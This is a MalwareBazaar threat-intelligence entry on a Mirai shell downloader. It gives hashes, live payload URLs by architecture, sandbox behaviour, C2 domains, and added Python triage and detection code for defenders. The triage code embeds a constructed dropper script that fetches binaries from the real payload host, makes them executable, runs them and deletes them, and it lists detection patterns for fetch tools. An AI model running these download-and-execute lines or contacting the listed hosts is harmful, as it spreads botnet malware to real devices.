MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 29fa130eed8854f328b218ef7fde38145c9b1fb9544e85fda781a9f7936f7a81. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: Mirai
Vendor detections: 9



SHA256 hash: 29fa130eed8854f328b218ef7fde38145c9b1fb9544e85fda781a9f7936f7a81
SHA3-384 hash: bf9a27608ac9dc2eade91f5f8a94ebb7707e9d07a0072e96cbfdadbba668052665f21d3230dc75e0a9fc7aa733362443
SHA1 hash: cb683ede5f691de75a3b2d725b3414d9620c5833
MD5 hash: 642010d857743ae8e24d76d5d84c8c1c
humanhash: aspen-timing-alaska-magazine
File name: 76d32be0.sh
Signature: Mirai
File size: 4'676 bytes
First seen: 2025-10-12 11:32:27 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 96:vDoLpDL3kLTwLL2EpLLbiLJPLr5LzULbaL1JL7NLbSLJi:224a
TLSH: T1D4A136F9747497BE6DB1ED7321DAC502B24170AAE4DA4C0AE2E1F0E4084EF61F4D4AC2
Magika: shell
Reporter: abuse_ch
Tags: mirai sh
URL | Malware sample (SHA256 hash) | Signature | Tags
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86 | 924b4daa3d183fc7d1312a17b68aa952c8d0136918478730cd95623bb1890ed9 | Mirai | elf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips | 4e06ece7ae576417a8dc0e419b8782ce0860cd9e90bc947b4c118e2a52786304 | Mirai | elf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl | 6294a0eb4ee65e6ba006a024522658107ec8753f6d3df2dc7309776199da65e7 | Mirai | elf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm | 236fa5092bd06813996532ef793834e31a69ed1e576599eaa97bcf8fb7db9b61 | Mirai | elf mirai
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5 | dc06d5d4daab1b23eef11b6eac8da75bafa7e75a7e44d60fb14c9db8199c7553 | Mirai | elf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6 | 41e5adc3527479d2bee1a3bb4c590899d40713df8fd20e0871a8f2e46a7afedd | Mirai | elf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7 | 6d65317a9d29fdfee8ff125c78705186155fdb0162f3d13890c43b971bdf6586 | Mirai | elf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc | cd58c26a61496c5f2091a6e51f6d2764a61073bf619bdd2322be5379b519c71d | Mirai | elf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k | fa94633bd1d61a6bfaad5d6308f4020013ccc11c9c9fa463e9795485b84ddaf5 | Mirai | elf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc | 9c08e0232337e3288d21e5f278f98d2a7d514763b85aa5d79c3588e81037ec5d | Mirai | elf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686 | 4bd20d49002299fd230f3eeddddcf6bf9e81033d15c8519cdfc296723a57b9d3 | Mirai | elf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4 | 8ac733a14bdcdf3b2543a8e420d2fa224bc067e425ac38ea9d99fbe389f48c44 | Mirai | elf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc | 248b6599aebc4e053a68ae502bafc1fec19cc1edcc455a8358e2d3dbe46f0e5e | Mirai | elf mirai ua-wget
http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86_64 | e1872b44f151615dd30c9120e8d8bd8d477212b7188a79478af49ff7df6610a9 | Mirai | elf mirai
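The table above shows the usual Mirai delivery layout: one host, one payload name, and a per-architecture suffix (x86, mips, arm5/6/7, ppc, m68k, spc, i686, sh4, arc, x86_64) fetched by a small shell script. The Python below is an added example, not MalwareBazaar code and not the contents of 76d32be0.sh, that statically triages such a downloader: it extracts the URLs, reads the target architecture off the suffix, checks for the fetch, chmod, execute and self-delete chain these droppers use, and cross-references each URL against the SHA256 hashes listed in this entry. SAMPLE_SCRIPT is a constructed stand-in shaped like this family's droppers; the hashes in KNOWN_DROPS are copied from the table (a subset, to keep the block short).

```python
"""Static triage of a Mirai-style shell downloader (added example).

Not MalwareBazaar code and not the sample from this entry.  SAMPLE_SCRIPT is
a constructed stand-in shaped like these droppers; the URLs and SHA256 hashes
in KNOWN_DROPS are copied from the entry's delivery table.
"""
import re
from urllib.parse import urlsplit

BASE = ("http://158.94.209.95/596a96cc7bf9108cd896f33c44aedc8a/"
        "db0fa4b8db0333367e9bda3ab68b8042")

# URL -> SHA256 of the payload served there (from this entry; subset).
KNOWN_DROPS = {
    BASE + ".x86":    "924b4daa3d183fc7d1312a17b68aa952c8d0136918478730cd95623bb1890ed9",
    BASE + ".mips":   "4e06ece7ae576417a8dc0e419b8782ce0860cd9e90bc947b4c118e2a52786304",
    BASE + ".arm7":   "6d65317a9d29fdfee8ff125c78705186155fdb0162f3d13890c43b971bdf6586",
    BASE + ".x86_64": "e1872b44f151615dd30c9120e8d8bd8d477212b7188a79478af49ff7df6610a9",
}

# Constructed input: "cd to a writable dir, fetch, chmod, run, delete",
# unrolled per architecture.  Not the real 76d32be0.sh.
SAMPLE_SCRIPT = f"""#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget {BASE}.x86 -O 76d32be0; chmod +x 76d32be0; ./76d32be0 x86; rm -rf 76d32be0
curl -s {BASE}.mips -o 76d32be0; chmod 777 76d32be0; ./76d32be0 mips; rm -rf 76d32be0
wget {BASE}.arm7 -O 76d32be0; chmod +x 76d32be0; ./76d32be0 arm7; rm -rf 76d32be0
"""

URL_RE = re.compile(r"""https?://[^\s;'"|&<>]+""")

# Each indicator is one link in the downloader chain.
INDICATORS = {
    "fetch_tool":      r"\b(?:wget|curl|tftp|ftpget)\b",
    "make_executable": r"\bchmod\s+(?:\+x|[0-7]{3,4})\b",
    "exec_dropped":    r"(?:^|[;&|]\s*)\./\S+",      # ./name right after ; & or |
    "self_delete":     r"\brm\s+-rf?\b",
    "writable_dir":    r"\bcd\s+/(?:tmp|var/run|dev/shm)\b",
}


def extract_urls(script: str) -> list:
    """Return download URLs in order of appearance, deduplicated."""
    seen, out = set(), []
    for u in URL_RE.findall(script):
        if u not in seen:
            seen.add(u)
            out.append(u)
    return out


def arch_of(url: str) -> str:
    """Mirai droppers name payloads <name>.<arch>; the suffix is the target arch."""
    return url.rsplit(".", 1)[-1]


def triage(script: str, known: dict = KNOWN_DROPS) -> dict:
    """Verdict plus the evidence behind it, for a ticket or an enrichment pipeline."""
    urls = extract_urls(script)
    hits = {name: bool(re.search(rx, script, re.M)) for name, rx in INDICATORS.items()}
    chain = hits["fetch_tool"] and hits["make_executable"] and hits["exec_dropped"]
    return {
        "verdict": "shell-downloader" if chain else "unknown",
        "indicators": hits,
        "hosts": sorted({urlsplit(u).hostname for u in urls}),
        "arches": [arch_of(u) for u in urls],
        # None means the URL is not in this entry's table and needs a fresh lookup.
        "matched": {u: known.get(u) for u in urls},
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_SCRIPT), indent=2))
```

The verdict deliberately requires all three of fetch, chmod and execute: a script that only fetches is an installer or an update hook far more often than a dropper, and the self-delete and writable-directory indicators are reported but not required because not every variant has them.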

Intelligence

File Origin
# of uploads: 1
# of downloads: 40
Origin country: DE

Vendor Threat Intelligence
Verdict: Malicious
File Type: unix shell
First seen: 2025-09-20T11:25:00Z UTC
Last seen: 2025-10-12T10:34:00Z UTC
Hits: ~10
Detections: HEUR:Trojan-Downloader.Shell.Agent.p, HEUR:Trojan-Downloader.Shell.Agent.gen, HEUR:Trojan-Downloader.Shell.Agent.a
Status: terminated
Behavior Graph (process tree recovered from the sandbox graph; raw node identifiers omitted):
  /usr/bin/sudo (pid 3770)
    execve -> /tmp/sample.bin (pid 3779), the script itself, which runs the following loop repeatedly:
      /usr/bin/wget, /usr/bin/curl [net, send-data, write-file] -> 158.94.209.95:80 (197 B / 146 B sent), later -> cnc.504.su:80 (198 B / 147 B sent)
      /usr/bin/cat, /usr/bin/chmod, /usr/bin/bash (clone)
      /tmp/76d32be0 [net] (pids 3902, 4004, 5237, 5253, 5294, 5303, 5312, 5321)
        clone -> /tmp/76d32be0 [dns, net, send-data, zombie]
          -> 8.8.8.8:53 (56 B sent)
          -> cnc.504.su:56999 (connect)
          clone -> /tmp/76d32be0 [net, net-scan, send-data]: sends data to 768, 1536, 1920, 4097, 4097, 4097 and 3072 IP addresses respectively across the iterations ("review logs to see them all")
        later instances also connect to 0.0.0.0:46157
Threat name: Linux.Downloader.Medusa
Status: Malicious
First seen: 2025-09-20 16:44:19 UTC
File Type: Text (Shell)
AV detection: 23 of 36 (63.89%)
Threat level: 3/5

Result
Malware family:
Score: 10/10
Tags: family:mirai botnet:unstable antivm botnet defense_evasion discovery linux upx
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
Checks CPU configuration
Reads system network configuration
UPX packed file
Enumerates active TCP sockets
Enumerates running processes
Writes file to system bin folder
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Contacts a large (54916) amount of remote hosts
Creates a large amount of network flows
Mirai
Mirai family
Malware Config
C2 Extraction:
cnc.504.su
scan.504.su
Please note that we are no longer able to provide a coverage score for Virus Total.
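The behavior graph and the vendor behaviour list above describe one chain from two angles: the script spawns wget/curl against 158.94.209.95:80, runs chmod, executes /tmp/76d32be0, which resolves a name via 8.8.8.8:53, connects to cnc.504.su:56999 and then forks a scanner that touches thousands of addresses. The Python below is an added example, not sandbox output and not MalwareBazaar code, that turns those observations into host-side detection logic over a constructed process/network event log (EVENTS) shaped like that graph. The pids, image paths, ports and the C2 names cnc.504.su / scan.504.su are taken from this entry; the scan targets and timestamps are made up.

```python
"""Detection logic for the dropper -> execute -> beacon -> scan chain (added example).

Not sandbox output and not MalwareBazaar code.  EVENTS is a constructed
process/network event log shaped like the behavior graph of this entry:
sudo -> /tmp/sample.bin -> wget (158.94.209.95:80) -> chmod -> /tmp/76d32be0,
which resolves a name via 8.8.8.8:53, connects to cnc.504.su:56999 and then
fans out to hundreds of hosts.  C2_DOMAINS are the names the Malware Config
section extracted.
"""
from collections import defaultdict

C2_DOMAINS = {"cnc.504.su", "scan.504.su"}          # from the entry's Malware Config
FETCHERS = {"/usr/bin/wget", "/usr/bin/curl"}
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")

EVENTS = [
    {"ts": 0.0, "type": "exec",    "pid": 3770, "ppid": 1,    "image": "/usr/bin/sudo"},
    {"ts": 0.1, "type": "exec",    "pid": 3779, "ppid": 3770, "image": "/tmp/sample.bin"},
    {"ts": 0.2, "type": "exec",    "pid": 3782, "ppid": 3779, "image": "/usr/bin/wget"},
    {"ts": 0.3, "type": "connect", "pid": 3782, "dst": "158.94.209.95", "port": 80},
    {"ts": 0.4, "type": "exec",    "pid": 3900, "ppid": 3779, "image": "/usr/bin/chmod"},
    {"ts": 0.5, "type": "exec",    "pid": 3902, "ppid": 3779, "image": "/tmp/76d32be0"},
    {"ts": 0.6, "type": "connect", "pid": 3902, "dst": "8.8.8.8", "port": 53},
    {"ts": 0.7, "type": "connect", "pid": 3902, "dst": "cnc.504.su", "port": 56999},
    {"ts": 0.8, "type": "exec",    "pid": 3908, "ppid": 3902, "image": "/tmp/76d32be0"},
]
# Scanner child: 768 distinct (constructed) targets on tcp/23 within one second.
EVENTS += [{"ts": 1.0 + i / 1000, "type": "connect", "pid": 3908,
            "dst": f"100.{64 + (i >> 8)}.{i & 255}.1", "port": 23} for i in range(768)]


def _execs(events):
    return [e for e in events if e["type"] == "exec"]


def dropper_chains(events, window=30.0):
    """One parent runs a fetch tool, chmod, then a binary from a world-writable dir."""
    by_parent = defaultdict(list)
    for e in _execs(events):
        by_parent[e["ppid"]].append(e)
    alerts = []
    for ppid, execs in by_parent.items():
        fetch = [e["ts"] for e in execs if e["image"] in FETCHERS]
        chmod = [e["ts"] for e in execs if e["image"].endswith("/chmod")]
        for d in execs:
            if not d["image"].startswith(WORLD_WRITABLE):
                continue
            fetched = any(t <= d["ts"] <= t + window for t in fetch)
            made_exec = any(t <= d["ts"] for t in chmod)
            if fetched and made_exec:
                alerts.append((ppid, d["pid"], d["image"]))
    return alerts


def tmp_exec_to_high_port(events, min_port=1024):
    """Binary living in a world-writable dir talks to a non-standard port (beacon)."""
    image = {e["pid"]: e["image"] for e in _execs(events)}
    return [(e["pid"], e["dst"], e["port"]) for e in events
            if e["type"] == "connect" and e["port"] >= min_port
            and image.get(e["pid"], "").startswith(WORLD_WRITABLE)]


def ioc_hits(events, iocs=C2_DOMAINS):
    """Direct match against the extracted C2 names; cheapest and most precise rule."""
    return [(e["pid"], e["dst"], e["port"]) for e in events
            if e["type"] == "connect" and e["dst"] in iocs]


def fan_out(events, threshold=256, window=60.0):
    """Per pid: distinct destinations within `window` of its first connect (scanner)."""
    first, dests = {}, defaultdict(set)
    for e in events:
        if e["type"] != "connect":
            continue
        first.setdefault(e["pid"], e["ts"])
        if e["ts"] - first[e["pid"]] <= window:
            dests[e["pid"]].add(e["dst"])
    return {pid: len(d) for pid, d in dests.items() if len(d) >= threshold}


if __name__ == "__main__":
    print("dropper chains :", dropper_chains(EVENTS))
    print("beacons        :", tmp_exec_to_high_port(EVENTS))
    print("C2 IOC hits    :", ioc_hits(EVENTS))
    print("scanners       :", fan_out(EVENTS))
```

The three behavioural rules are independent on purpose: the IOC match stops working the moment the operator rotates cnc.504.su, the dropper-chain rule still fires on the next payload host, and the fan-out rule catches the scanner stage even if the binary were fetched by some other means. Note that /tmp/sample.bin itself is not flagged by dropper_chains, because its parent (sudo) never ran a fetch tool; that is the sandbox harness, not the malware, executing it.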

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Linux_Shellscript_Downloader
Author: albertzsigovits
Description: Generic Approach to Shellscript downloaders

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download
Signature: Mirai
File type: sh
SHA256 hash: 29fa130eed8854f328b218ef7fde38145c9b1fb9544e85fda781a9f7936f7a81 (this sample)

Comments